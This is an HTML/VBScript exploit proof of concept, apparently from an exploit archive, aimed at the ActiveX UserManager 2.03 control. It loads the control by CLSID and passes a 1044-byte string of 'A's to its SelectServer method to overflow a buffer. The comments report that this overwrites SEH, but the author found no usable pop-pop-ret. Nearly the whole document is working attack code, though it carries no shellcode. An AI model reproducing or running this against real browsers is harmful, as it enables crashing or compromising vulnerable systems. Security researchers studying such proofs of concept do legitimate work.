< html > |
< object classid = 'clsid:E5D2CE27-5FA0-11D2-A666-204C4F4F5020' id = 'target' ></ object > |
< script language = 'vbscript' > |
' Exploit Title: ActiveX UserManager 2.03 Buffer Overflow |
' Date: January 16, 2011 |
' Author: Blake |
' Software Link: http://www.brothersoft.com/activex-usermanager-14519.html |
' Version: 2.03 |
' Tested on: Windows XP SP3 / IE7 in VirtualBox |
' Overwrites SEH with 00410041 but I could not find a useable pop pop ret |
|
|
arg1=String(1044, "A") |
arg2=True |
exploit = arg1 |
|
target.SelectServer exploit ,arg2 |
|
</ script > |
0 条评论。